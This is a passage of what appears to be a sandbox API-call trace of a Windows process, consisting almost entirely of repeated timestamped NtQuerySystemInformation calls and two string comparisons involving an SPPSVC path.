(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0297.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0297.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0297.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0297.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0297.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0297.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0297.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0297.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecf0, Length=0x28, ResultLength=0x0) [0297.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0297.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed70, Length=0x28, ResultLength=0x0) [0297.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed70, Length=0x28, ResultLength=0x0) [0297.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0297.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0297.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0297.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0297.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0297.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0297.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x28, ResultLength=0x0) [0297.591] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0297.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0297.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0297.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0297.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0297.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0297.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0297.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0297.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eeb0, Length=0x28, ResultLength=0x0) [0297.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0297.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x28, ResultLength=0x0) [0297.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x28, ResultLength=0x0) [0297.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x20, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x20, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x20, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x20, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x28, ResultLength=0x0) [0297.607] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0297.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0297.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0297.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0297.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0297.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0297.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eeb0, Length=0x28, ResultLength=0x0) [0297.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0297.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x28, ResultLength=0x0) [0297.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x28, ResultLength=0x0) [0297.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0297.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x20, ResultLength=0x0) [0297.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0297.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0297.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0297.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0297.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x20, ResultLength=0x0) [0297.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x20, ResultLength=0x0) [0297.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x20, ResultLength=0x0) [0297.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0297.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0297.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0297.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0297.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0297.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0297.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0297.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0297.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0297.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0297.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0297.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0297.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x28, ResultLength=0x0) [0297.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0297.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x28, ResultLength=0x0) [0297.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x28, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e670, Length=0x20, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e5f0, Length=0x20, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e5f0, Length=0x20, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e5f0, Length=0x20, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.642] NtQuerySystemInformation (SystemInformationClass=0xb9, 